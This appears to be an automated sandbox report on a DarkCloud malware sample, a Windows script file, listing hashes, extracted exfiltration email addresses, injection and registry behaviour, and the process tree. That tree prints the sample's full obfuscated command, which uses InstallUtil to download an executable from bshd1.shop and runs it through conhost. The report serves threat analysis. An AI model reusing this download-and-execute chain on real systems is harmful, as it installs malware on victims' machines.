Analysis
-
max time kernel
145s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
03-05-2024 11:33
Static task
static1
Behavioral task
behavioral1
Sample
SOA_XSL.wsf
Resource
win7-20240221-en
General
-
Target
SOA_XSL.wsf
-
Size
795B
-
MD5
644ca3a3f10afbeab56d93ce4ad7f0ba
-
SHA1
ef5dcb8a6e1a1152d116411f784a609c8f870a0a
-
SHA256
377180ae7109057e5f8403307834211a4c75a584be3090552cb059e52bf4a192
-
SHA512
da09d35e3dabf0f4c4d541b0322ca1e2600522d7d41abc6adf04d568a58af8a98e89bbcd83a67869e1becaf6fda412aaf0762f1465e47faceaf06293d1db27ea
Malware Config
Extracted
darkcloud
-
email_from
igor.bos@vinoterra.ru
-
email_to
office.tony39@mail.ru
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
Processes:
file532024[1].exepid process 4444 file532024[1].exe -
Loads dropped DLL 2 IoCs
Processes:
InstallUtil.exepid process 1484 InstallUtil.exe 1484 InstallUtil.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6WJSJ70T\file532024[1].exe autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
file532024[1].exedescription pid process target process PID 4444 set thread context of 2940 4444 file532024[1].exe svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" rundll32.exe -
Modifies registry class 16 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies rundll32.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History rundll32.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\MuiCache rundll32.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache rundll32.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache rundll32.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
file532024[1].exepid process 4444 file532024[1].exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundll32.exepid process 3336 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
svchost.exepid process 2940 svchost.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
WScript.execmd.exerundll32.execonhost.exefile532024[1].exedescription pid process target process PID 1208 wrote to memory of 768 1208 WScript.exe cmd.exe PID 1208 wrote to memory of 768 1208 WScript.exe cmd.exe PID 768 wrote to memory of 1268 768 cmd.exe DeviceCredentialDeployment.exe PID 768 wrote to memory of 1268 768 cmd.exe DeviceCredentialDeployment.exe PID 768 wrote to memory of 3336 768 cmd.exe rundll32.exe PID 768 wrote to memory of 3336 768 cmd.exe rundll32.exe PID 3336 wrote to memory of 628 3336 rundll32.exe rundll32.exe PID 3336 wrote to memory of 628 3336 rundll32.exe rundll32.exe PID 768 wrote to memory of 1484 768 cmd.exe InstallUtil.exe PID 768 wrote to memory of 1484 768 cmd.exe InstallUtil.exe PID 768 wrote to memory of 1484 768 cmd.exe InstallUtil.exe PID 768 wrote to memory of 2332 768 cmd.exe cmd.exe PID 768 wrote to memory of 2332 768 cmd.exe cmd.exe PID 768 wrote to memory of 1952 768 cmd.exe conhost.exe PID 768 wrote to memory of 1952 768 cmd.exe conhost.exe PID 1952 wrote to memory of 4444 1952 conhost.exe file532024[1].exe PID 1952 wrote to memory of 4444 1952 conhost.exe file532024[1].exe PID 1952 wrote to memory of 4444 1952 conhost.exe file532024[1].exe PID 4444 wrote to memory of 2940 4444 file532024[1].exe svchost.exe PID 4444 wrote to memory of 2940 4444 file532024[1].exe svchost.exe PID 4444 wrote to memory of 2940 4444 file532024[1].exe svchost.exe PID 4444 wrote to memory of 2940 4444 file532024[1].exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOA_XSL.wsf"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "/C DeVIceCREDeNTIalDeploymeNt.eXe & RUNdLl32 inEtCPL.cpL , ClearMyTracksByProcess 8 && C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\inStallUtIL https://bshd1.shop/ljeCUBbq/file532024.exe && tiMeoUT /t 7 /NOBrEak > nuL & fOR /f %A in ( ' dIR C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\ /S /b ' ) Do cONHosT %A"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\DeviceCredentialDeployment.exeDeVIceCREDeNTIalDeploymeNt.eXe3⤵
-
C:\Windows\system32\rundll32.exeRUNdLl32 inEtCPL.cpL , ClearMyTracksByProcess 83⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:00000000000000004⤵
- Modifies registry class
-
C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\InstallUtil.exeC:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\inStallUtIL https://bshd1.shop/ljeCUBbq/file532024.exe3⤵
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dIR C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\ /S /b3⤵
-
C:\Windows\system32\conhost.execONHosT C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exeC:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe5⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6WJSJ70T\file532024[1].exeFilesize
1.3MB
MD599332016403c66ac129b2ab34e97b0ed
SHA137c0df4ea5fa74972be7619094081dc726cbf665
SHA2563116fd6a924c1f827b67fbf721d6be3ba1ac8a71da15a6dff5548cfce2231650
SHA512351e06565a3e2f8e227dc8f404c5e368553643540f0f9349d780e0973f89be95b1cb286498b42c2851bdc2094032554268d50b0f165548704ef6ecacbb5da00e
-
memory/1484-0-0x0000000000510000-0x000000000051C000-memory.dmpFilesize
48KB
-
memory/1484-1-0x0000000000F30000-0x0000000000F4A000-memory.dmpFilesize
104KB
-
memory/2940-28-0x0000000000400000-0x0000000000460000-memory.dmpFilesize
384KB
-
memory/2940-29-0x0000000000400000-0x0000000000460000-memory.dmpFilesize
384KB